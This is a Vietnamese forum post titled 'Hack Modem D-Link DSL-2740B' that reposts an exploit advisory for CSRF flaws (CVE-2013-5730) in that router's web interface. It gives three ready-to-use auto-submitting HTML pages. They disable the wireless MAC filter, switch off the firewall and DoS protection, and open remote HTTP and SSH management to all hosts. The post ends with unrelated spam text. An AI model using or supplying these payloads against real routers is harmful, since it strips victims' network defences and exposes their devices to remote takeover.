Hack Modem D-Link DSL-2740B

dayto.kdh

Administrator
Hack Modem D-Link DSL-2740B
Mã khai thác công bố ngày : 2013-09-12

Tác giả : Ivano Binetti


Code:
[COLOR=#333333][FONT=Verdana]+--------------------------------------------------------------------------------------------------------------------------------+[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]# Exploit Title    : D-Link DSL-2740B (ADSL Router) CSRF Vulnerability[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]# Date             : 09-08-2013[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]# Author           : Ivano Binetti (http://ivanobinetti.com)[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]# Vendor site      : http://www.d-link.com[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]# Version          : DSL-2740B[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]# Tested on        : Firmware Version: EU_1.00 (Other release could be affected)[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]# Original Advisory: http://www.webapp-security.com/2013/09/d-link-dsl-2740b-multiple-csrf-vulnerabilities[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]# CVE              : CVE-2013-5730[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]+---------------------------------------------------------------------------------------------------------------------------------+[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]Summary[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]
[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]1)Introduction[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]2)Vulnerability Description[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]3)Exploit[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]3.1 Disable/Enable Wireless MAc Address Filter[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]3.2 Disable/Enable all the Firewall protections (Both "SPI" and "DOS and Portscan Protection")[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]3.3 Enable/Disable Remote Management (in my exploit I enabled remote management via http - tcp port 80 - and ssh - tcp port 22 -)[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]+---------------------------------------------------------------------------------------------------------------------------------+[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]
[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]
[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]1) Introduction[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]
[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]D-Link DSL-2740B is an ADSL Router using, also,  a web management interface in order to set and change device parameters.[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]
[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]
[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]2) Vulnerability Description[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]
[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]The D-Link DSL-2640B's web interface (listening on tcp/ip port 80) is prone to CSRF vulnerabilities which allows to change router[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]parameters and to perform many modifications to the router's parameters. The default ip adress of this adsl router, used for[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]management purpose, is 192.168.1.1.[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]In my Advisory I'll describe only how to carry out the following changes:[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]- Disable/Enable Wireless MAc Address Filter[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]- Disable/Enable all the Firewall protections (Both "SPI" and "DOS and Portscan Protection")[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]- Enable/Disable Remote Management (in my exploit I enabled remote management via http - tcp port 80 - and ssh - tcp port 22 -).[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]Many other changes can be performed.[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]
[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]3) Exploit[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]3.1 Disable/Enable Wireless MAc Address Filter[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]<html>[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]<body onload="javascript:document.forms[0].submit()">[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]<H2>CSRF Exploit</H2>[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]<form method="POST" name="form0" action="http://192.168.1.1:80/wlmacflt.cmd?action=wlFltMode&wlFltMacMode=disabled">[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]</body>[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]</html>[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]
[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]3.2 Disable/Enable all the Firewall protections (Both "SPI" and "DOS and Portscan Protection")[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]<html>[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]<body onload="javascript:document.forms[0].submit()">[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]<H2></H2>[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]<form method="POST" name="form0" action="http://192.168.1.1:80/scdmz.cmd?&fwFlag=521472&dosenbl=0">[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]</body>[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]</html>[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]
[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]3.3 Enable/Disable Remote Management (in my exploit I enabled remote management via http - tcp port 80 - and ssh - tcp port 22 -)[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]<html>[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]<body onload="javascript:document.forms[0].submit()">[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]<H2></H2>[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]<form method="POST" name="form0" action="http://192.168.1.1:80/scsrvcntr.cmd?action=save&rmtmode=1&rmtport=80&rmtaction=allowall&[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]ftp=0&http=2&icmp=2&snmp=2&tftp=0&ssh=1&telnet=0">[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]</body>[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]</html>[/FONT][/COLOR]
[COLOR=#333333][FONT=Verdana]+----------------------------------------------------------------------------------------------------------------------------------+[/FONT][/COLOR]
 
xây nhà trọn gói tại quảng ngãi xây nhà trọn gói quảng ngãi xây nhà trọn gói tại quảng ngãi nội thất quảng ngãi
Top